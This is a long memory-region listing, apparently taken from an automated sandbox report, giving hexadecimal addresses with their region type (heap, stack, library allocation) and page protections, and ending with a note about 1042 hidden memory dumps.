page read and write
2924000
trusted library allocation
page read and write
4CD9000
heap
page read and write
5D0B000
heap
page read and write
286B000
heap
page read and write
4B5A000
trusted library allocation
page read and write
48D000
stack
page read and write
773A000
heap
page read and write
622C000
heap
page read and write
4C32000
direct allocation
page read and write
2826000
heap
page read and write
502E000
stack
page read and write
2828000
heap
page read and write
4F80000
heap
page read and write
70ED000
stack
page read and write
4BE9000
trusted library allocation
page read and write
7A10000
trusted library allocation
page read and write
6300000
trusted library allocation
page read and write
32C0000
heap
page read and write
2BC8000
stack
page read and write
6161000
heap
page read and write
6203000
heap
page read and write
6D4E000
stack
page read and write
5785000
heap
page read and write
6C4E000
stack
page read and write
27DC000
stack
page read and write
6166000
trusted library allocation
page read and write
286C000
heap
page read and write
5D53000
heap
page read and write
7204000
heap
page read and write
5817000
heap
page read and write
5C9E000
heap
page read and write
61E1000
heap
page read and write
4CCE000
heap
page read and write
5895000
trusted library allocation
page read and write
2F7E000
stack
page read and write
7BB0000
trusted library allocation
page execute and read and write
851E000
stack
page read and write
5D8F000
heap
page read and write
8100000
trusted library allocation
page read and write
570B000
heap
page read and write
284B000
heap
page read and write
5D86000
heap
page read and write
7A40000
trusted library allocation
page read and write
42D0000
heap
page execute and read and write
622F000
heap
page read and write
8250000
trusted library allocation
page read and write
5D53000
heap
page read and write
5D1A000
heap
page read and write
28D8000
heap
page read and write
4B48000
trusted library allocation
page read and write
329D000
heap
page read and write
56F3000
heap
page read and write
28D8000
heap
page read and write
5D47000
heap
page read and write
2E40000
heap
page read and write
620A000
heap
page read and write
5D87000
heap
page read and write
5D86000
heap
page read and write
622F000
heap
page read and write
4A57000
heap
page read and write
8080000
heap
page read and write
4B76000
trusted library allocation
page read and write
61A1000
heap
page read and write
5783000
heap
page read and write
32A8000
heap
page read and write
6234000
heap
page read and write
32A8000
heap
page read and write
5D53000
heap
page read and write
5D8F000
heap
page read and write
831E000
stack
page read and write
84DD000
stack
page read and write
5CB2000
heap
page read and write
622F000
heap
page read and write
5D83000
heap
page read and write
71D0000
trusted library allocation
page read and write
6227000
heap
page read and write
2819000
heap
page read and write
839E000
stack
page read and write
5BDB000
heap
page read and write
2A90000
heap
page read and write
5D80000
heap
page read and write
82DE000
stack
page read and write
2849000
heap
page read and write
2839000
heap
page read and write
5CA0000
heap
page read and write
7FA0000
trusted library allocation
page read and write
4AA8000
trusted library allocation
page read and write
2BAE000
stack
page read and write
28CB000
heap
page read and write
26A7000
heap
page read and write
6222000
heap
page read and write
6168000
heap
page read and write
29DE000
stack
page read and write
620B000
heap
page read and write
6249000
heap
page read and write
76FB000
heap
page read and write
32E2000
heap
page read and write
5D83000
heap
page read and write
6224000
heap
page read and write
616F000
heap
page read and write
84F000
stack
page read and write
5D86000
heap
page read and write
5D4F000
heap
page read and write
61A5000
heap
page read and write
7110000
trusted library allocation
page read and write
61A4000
heap
page read and write
5D45000
heap
page read and write
5D86000
heap
page read and write
32AE000
heap
page read and write
2747000
heap
page read and write
5D45000
heap
page read and write
4B1F000
trusted library allocation
page read and write
702E000
stack
page read and write
6168000
heap
page read and write
86BE000
stack
page read and write
676C000
stack
page read and write
34C000
stack
page read and write
2C30000
heap
page read and write
6218000
heap
page read and write
4C2A000
trusted library allocation
page read and write
4666000
heap
page read and write
71A0000
trusted library allocation
page read and write
5783000
heap
page read and write
56F1000
trusted library allocation
page read and write
56E5000
heap
page read and write
75C0000
trusted library allocation
page read and write
697D000
stack
page read and write
324D000
heap
page read and write
2DBE000
heap
page read and write
6D2F000
stack
page read and write
6CF5000
heap
page execute and read and write
7741000
heap
page read and write
61A5000
heap
page read and write
5783000
heap
page read and write
6C0F000
stack
page read and write
6222000
heap
page read and write
620A000
heap
page read and write
5B11000
trusted library allocation
page read and write
6030000
trusted library allocation
page execute
68C0000
trusted library section
page read and write
6244000
heap
page read and write
3259000
heap
page read and write
51CE000
direct allocation
page read and write
2853000
heap
page read and write
825B000
trusted library allocation
page read and write
4ACA000
stack
page read and write
2C90000
trusted library allocation
page read and write
56DE000
heap
page read and write
2A3D000
stack
page read and write
6234000
heap
page read and write
4D26000
heap
page read and write
79A0000
trusted library allocation
page read and write
5C97000
heap
page read and write
63DB000
trusted library allocation
page read and write
363F000
stack
page read and write
4CE3000
heap
page read and write
500E000
stack
page read and write
4D18000
heap
page read and write
3FD000
stack
page read and write
2A38000
stack
page read and write
61D8000
heap
page read and write
7DDE000
heap
page read and write
5D51000
heap
page read and write
7DAB000
heap
page read and write
76A0000
trusted library allocation
page read and write
5D87000
heap
page read and write
61FF000
heap
page read and write
616D000
heap
page read and write
37F5000
heap
page read and write
5257000
trusted library allocation
page read and write
5A49000
trusted library allocation
page read and write
6330000
trusted library allocation
page read and write
622C000
heap
page read and write
56A9000
heap
page read and write
5D8F000
heap
page read and write
5D1A000
heap
page read and write
31C0000
heap
page read and write
7D10000
trusted library allocation
page read and write
6203000
heap
page read and write
32BF000
heap
page read and write
7130000
trusted library allocation
page read and write
616F000
heap
page read and write
6222000
heap
page read and write
4D02000
heap
page read and write
6E49000
heap
page read and write
5BA0000
heap
page read and write
2CB2000
trusted library allocation
page read and write
32BD000
heap
page read and write
5D83000
heap
page read and write
4C26000
direct allocation
page read and write
5FF0000
trusted library allocation
page read and write
6D00000
heap
page read and write
5E0E000
stack
page read and write
5D86000
heap
page read and write
6244000
heap
page read and write
5D8F000
heap
page read and write
56A1000
heap
page read and write
57EA000
heap
page read and write
303B000
stack
page read and write
4C22000
direct allocation
page read and write
37FB000
heap
page read and write
2854000
heap
page read and write
5F0F000
stack
page read and write
302C000
heap
page read and write
2640000
heap
page read and write
726E000
heap
page read and write
622C000
heap
page read and write
49EE000
stack
page read and write
86FE000
stack
page read and write
306C000
heap
page read and write
27FE000
heap
page read and write
61AC000
heap
page read and write
28D4000
heap
page read and write
5E5F000
trusted library allocation
page read and write
5D8F000
heap
page read and write
4753000
trusted library allocation
page read and write
285D000
heap
page read and write
5783000
heap
page read and write
6211000
heap
page read and write
5D86000
heap
page read and write
6244000
heap
page read and write
6222000
heap
page read and write
4950000
trusted library allocation
page read and write
4EF6000
trusted library allocation
page read and write
7A20000
trusted library allocation
page read and write
4D38000
heap
page read and write
519F000
stack
page read and write
57A0000
heap
page read and write
5892000
trusted library allocation
page read and write
496D000
trusted library allocation
page execute and read and write
328A000
heap
page read and write
6109000
heap
page read and write
8440000
trusted library allocation
page execute and read and write
5D09000
heap
page read and write
6174000
heap
page read and write
618E000
heap
page read and write
2A40000
heap
page read and write
6F40000
heap
page execute and read and write
6BCE000
stack
page read and write
7680000
trusted library allocation
page read and write
5E54000
trusted library allocation
page read and write
2DFE000
heap
page read and write
57A1000
heap
page read and write
58A1000
trusted library allocation
page read and write
5899000
trusted library allocation
page read and write
615A000
heap
page read and write
2CB5000
trusted library allocation
page execute and read and write
61B6000
heap
page read and write
509E000
stack
page read and write
51A0000
direct allocation
page read and write
6195000
heap
page read and write
4BD8000
trusted library allocation
page read and write
5C6F000
stack
page read and write
4CD8000
heap
page read and write
50F0000
heap
page execute and read and write
8530000
trusted library allocation
page execute and read and write
2853000
heap
page read and write
4EEE000
trusted library allocation
page read and write
713E000
stack
page read and write
75C2000
heap
page read and write
5D86000
heap
page read and write
7180000
trusted library allocation
page read and write
60E0000
heap
page read and write
2F20000
heap
page read and write
6236000
heap
page read and write
2743000
heap
page read and write
28D8000
heap
page read and write
7820000
trusted library allocation
page read and write
27F1000
heap
page read and write
2877000
heap
page read and write
2C80000
trusted library allocation
page read and write
27B0000
heap
page read and write
2B60000
heap
page read and write
6224000
heap
page read and write
2849000
heap
page read and write
2C8D000
trusted library allocation
page execute and read and write
2D99000
heap
page read and write
6197000
heap
page read and write
61E1000
heap
page read and write
621D000
heap
page read and write
5D80000
heap
page read and write
26A0000
heap
page read and write
4B11000
trusted library allocation
page read and write
5811000
heap
page read and write
56EE000
heap
page read and write
5DA1000
trusted library allocation
page read and write
2BE6000
heap
page read and write
4EAE000
stack
page read and write
6FAE000
stack
page read and write
61BC000
heap
page read and write
7310000
trusted library allocation
page read and write
6B8E000
stack
page read and write
4C60000
direct allocation
page read and write
2876000
heap
page read and write
3075000
heap
page read and write
2CB0000
trusted library allocation
page read and write
6222000
heap
page read and write
619F000
heap
page read and write
7120000
trusted library allocation
page read and write
622E000
heap
page read and write
710000
heap
page read and write
8460000
trusted library allocation
page read and write
5D87000
heap
page read and write
32E2000
heap
page read and write
3259000
heap
page read and write
75E0000
trusted library allocation
page read and write
4D2D000
heap
page read and write
28DD000
heap
page read and write
5CAF000
heap
page read and write
2B76000
heap
page read and write
4A50000
heap
page read and write
571A000
heap
page read and write
5783000
heap
page read and write
28D2000
heap
page read and write
4D1D000
heap
page read and write
4979000
trusted library allocation
page read and write
7CAB000
trusted library allocation
page read and write
61AC000
heap
page read and write
4E3E000
stack
page read and write
61A8000
heap
page read and write
353E000
stack
page read and write
79D0000
trusted library allocation
page read and write
620A000
heap
page read and write
2876000
heap
page read and write
5810000
heap
page read and write
6218000
heap
page read and write
4B00000
heap
page read and write
7F90000
trusted library allocation
page read and write
7C7E000
stack
page read and write
5D51000
heap
page read and write
56B1000
heap
page read and write
6197000
heap
page read and write
552F000
stack
page read and write
616D000
heap
page read and write
6EFB000
heap
page read and write
7670000
trusted library allocation
page read and write
6F17000
heap
page read and write
71BE000
stack
page read and write
2ADE000
stack
page read and write
5D45000
heap
page read and write
4E34000
trusted library allocation
page read and write
83FE000
stack
page read and write
6104000
heap
page read and write
5C16000
heap
page read and write
32CA000
heap
page read and write
49AF000
stack
page read and write
4A2F000
stack
page read and write
7990000
trusted library allocation
page read and write
86DB000
stack
page read and write
2C2E000
stack
page read and write
79E0000
trusted library allocation
page read and write
5D09000
heap
page read and write
7A00000
trusted library allocation
page read and write
868000
heap
page read and write
7CD0000
heap
page read and write
5628000
trusted library allocation
page read and write
620C000
heap
page read and write
3218000
heap
page read and write
7810000
trusted library allocation
page read and write
5D83000
heap
page read and write
61DE000
heap
page read and write
8430000
heap
page read and write
5C97000
heap
page read and write
616F000
heap
page read and write
6A7E000
stack
page read and write
56B4000
heap
page read and write
6224000
heap
page read and write
56C9000
heap
page read and write
74FE000
stack
page read and write
5723000
heap
page read and write
32ED000
heap
page read and write
7140000
trusted library allocation
page read and write
717E000
stack
page read and write
4CD5000
heap
page read and write
6CEE000
stack
page read and write
2845000
heap
page read and write
6234000
heap
page read and write
32E2000
heap
page read and write
622C000
heap
page read and write
4E7A000
trusted library allocation
page read and write
5D86000
heap
page read and write
3296000
heap
page read and write
70E000
stack
page read and write
263E000
stack
page read and write
757E000
stack
page read and write
620A000
heap
page read and write
5CAF000
heap
page read and write
31B0000
heap
page read and write
774B000
heap
page read and write
5D1B000
heap
page read and write
27FE000
heap
page read and write
5D47000
heap
page read and write
3218000
heap
page read and write
5D1A000
heap
page read and write
5722000
heap
page read and write
2B7A000
heap
page read and write
4CDE000
heap
page read and write
2790000
heap
page read and write
2C99000
trusted library allocation
page read and write
6165000
heap
page read and write
281F000
heap
page read and write
4AB0000
trusted library allocation
page read and write
6165000
heap
page read and write
5D45000
heap
page read and write
426D000
stack
page read and write
289C000
heap
page read and write
56A0000
heap
page read and write
7690000
trusted library allocation
page read and write
797D000
stack
page read and write
622C000
heap
page read and write
6C6E000
stack
page read and write
23FE000
stack
page read and write
329A000
heap
page read and write
77F0000
trusted library allocation
page read and write
7A30000
trusted library allocation
page read and write
5722000
heap
page read and write
542E000
stack
page read and write
623E000
heap
page read and write
4FB0000
heap
page read and write
2842000
heap
page read and write
2952000
trusted library allocation
page read and write
7E4B000
heap
page read and write
286B000
heap
page read and write
7D00000
trusted library allocation
page read and write
69FE000
stack
page read and write
5D84000
heap
page read and write
56AC000
heap
page read and write
2812000
heap
page read and write
7DE6000
heap
page read and write
5D66000
heap
page read and write
5D09000
heap
page read and write
616F000
heap
page read and write
691E000
stack
page read and write
8440000
trusted library allocation
page read and write
43A7000
heap
page read and write
61FE000
heap
page read and write
4D38000
heap
page read and write
4CD3000
heap
page read and write
56D6000
heap
page read and write
4DFC000
stack
page read and write
2740000
heap
page read and write
4D24000
heap
page read and write
5722000
heap
page read and write
4F48000
heap
page read and write
5D1B000
heap
page read and write
4664000
heap
page read and write
616F000
heap
page read and write
620A000
heap
page read and write
6222000
heap
page read and write
4FEE000
stack
page read and write
61D7000
heap
page read and write
620A000
heap
page read and write
498A000
trusted library allocation
page execute and read and write
7640000
trusted library allocation
page read and write
7DA2000
heap
page read and write
79F0000
trusted library allocation
page read and write
4CC0000
heap
page read and write
622C000
heap
page read and write
5DA5000
trusted library allocation
page read and write
2848000
heap
page read and write
6398000
trusted library allocation
page read and write
6211000
heap
page read and write
4A3E000
stack
page read and write
6AC0000
heap
page read and write
6F1C000
heap
page read and write
7273000
heap
page read and write
793E000
stack
page read and write
74FE000
stack
page read and write
2C84000
trusted library allocation
page read and write
5C6E000
heap
page read and write
4BD3000
trusted library allocation
page read and write
61A1000
heap
page read and write
28DC000
heap
page read and write
60B0000
trusted library allocation
page read and write
3217000
heap
page read and write
4CBD000
heap
page read and write
6219000
heap
page read and write
5D53000
heap
page read and write
7170000
trusted library allocation
page read and write
5353000
trusted library allocation
page read and write
620A000
heap
page read and write
6E75000
heap
page read and write
56C2000
heap
page read and write
5620000
trusted library allocation
page read and write
32AE000
heap
page read and write
7620000
trusted library allocation
page read and write
5D45000
heap
page read and write
7650000
trusted library allocation
page read and write
3211000
heap
page read and write
2CF0000
heap
page execute and read and write
7798000
heap
page read and write
5DAE000
trusted library allocation
page read and write
5D81000
heap
page read and write
80B0000
trusted library allocation
page read and write
713E000
stack
page read and write
62F6000
trusted library allocation
page read and write
4DA8000
trusted library allocation
page read and write
5722000
heap
page read and write
8EE0000
heap
page read and write
2923000
trusted library allocation
page execute and read and write
7C90000
trusted library allocation
page execute and read and write
37FB000
heap
page read and write
2812000
heap
page read and write
70F0000
trusted library allocation
page read and write
31A0000
heap
page read and write
32E2000
heap
page read and write
5D7C000
heap
page read and write
5D86000
heap
page read and write
6109000
heap
page read and write
604C000
stack
page read and write
7CA0000
trusted library allocation
page read and write
4CD4000
heap
page read and write
2FBE000
stack
page read and write
32E2000
heap
page read and write
5D45000
heap
page read and write
6101000
trusted library allocation
page read and write
42CE000
stack
page read and write
6203000
heap
page read and write
6129000
trusted library allocation
page read and write
3069000
heap
page read and write
7160000
trusted library allocation
page read and write
687E000
stack
page read and write
27DF000
heap
page read and write
2CE0000
heap
page read and write
672E000
stack
page read and write
653F000
stack
page read and write
4F2E000
stack
page read and write
6234000
heap
page read and write
32E2000
heap
page read and write
5E5B000
trusted library allocation
page read and write
7266000
heap
page read and write
28DC000
heap
page read and write
5D53000
heap
page read and write
616D000
heap
page read and write
58C000
stack
page read and write
5D80000
heap
page read and write
7DEE000
heap
page read and write
31A8000
heap
page read and write
321E000
heap
page read and write
5CAC000
heap
page read and write
281E000
heap
page read and write
7E31000
heap
page read and write
56A5000
heap
page read and write
23B7000
stack
page read and write
5D09000
heap
page read and write
5CA5000
heap
page read and write
4D2D000
heap
page read and write
4C80000
direct allocation
page read and write
5713000
heap
page read and write
620A000
heap
page read and write
6F30000
trusted library allocation
page read and write
56C6000
heap
page read and write
6A0000
heap
page read and write
61D8000
heap
page read and write
4970000
trusted library allocation
page read and write
4980000
trusted library allocation
page read and write
6195000
heap
page read and write
7CB0000
trusted library allocation
page read and write
5540000
heap
page read and write
622C000
heap
page read and write
7340000
heap
page read and write
2BB0000
heap
page read and write
75BD000
stack
page read and write
56F6000
heap
page read and write
329D000
heap
page read and write
5D51000
heap
page read and write
32AE000
heap
page read and write
5D45000
heap
page read and write
4992000
trusted library allocation
page read and write
610B000
heap
page read and write
4CA8000
heap
page read and write
2C70000
trusted library allocation
page read and write
56F6000
heap
page read and write
6234000
heap
page read and write
681C000
stack
page read and write
99E000
stack
page read and write
2BE0000
heap
page read and write
6F60000
heap
page read and write
61A1000
heap
page read and write
61DF000
heap
page read and write
60E1000
heap
page read and write
61D8000
heap
page read and write
5722000
heap
page read and write
616D000
heap
page read and write
7200000
heap
page read and write
6E30000
heap
page read and write
7292000
heap
page read and write
31C5000
heap
page read and write
6241000
heap
page read and write
2853000
heap
page read and write
27E8000
heap
page read and write
4960000
trusted library allocation
page read and write
84D5000
trusted library allocation
page read and write
2714000
heap
page read and write
570E000
heap
page read and write
1CA000
stack
page read and write
4964000
trusted library allocation
page read and write
2940000
trusted library allocation
page read and write
616D000
heap
page read and write
42E0000
heap
page read and write
61E1000
heap
page read and write
4CF9000
heap
page read and write
7FD28000
trusted library allocation
page execute and read and write
6224000
heap
page read and write
2822000
heap
page read and write
622C000
heap
page read and write
6B70000
heap
page read and write
5D80000
heap
page read and write
2812000
heap
page read and write
8470000
heap
page read and write
4963000
trusted library allocation
page execute and read and write
29BE000
stack
page read and write
313B000
stack
page read and write
32BF000
heap
page read and write
4D00000
heap
page read and write
2755000
heap
page read and write
28EF000
stack
page read and write
6C8F000
stack
page read and write
6234000
heap
page read and write
63E000
stack
page read and write
5D45000
heap
page read and write
4CA0000
heap
page read and write
4D0E000
heap
page read and write
7230000
heap
page read and write
6222000
heap
page read and write
2720000
heap
page read and write
2D70000
heap
page read and write
6168000
heap
page read and write
5D45000
heap
page read and write
28D4000
heap
page read and write
5BA1000
heap
page read and write
292D000
trusted library allocation
page execute and read and write
There are 1042 hidden memdumps, click here to show them.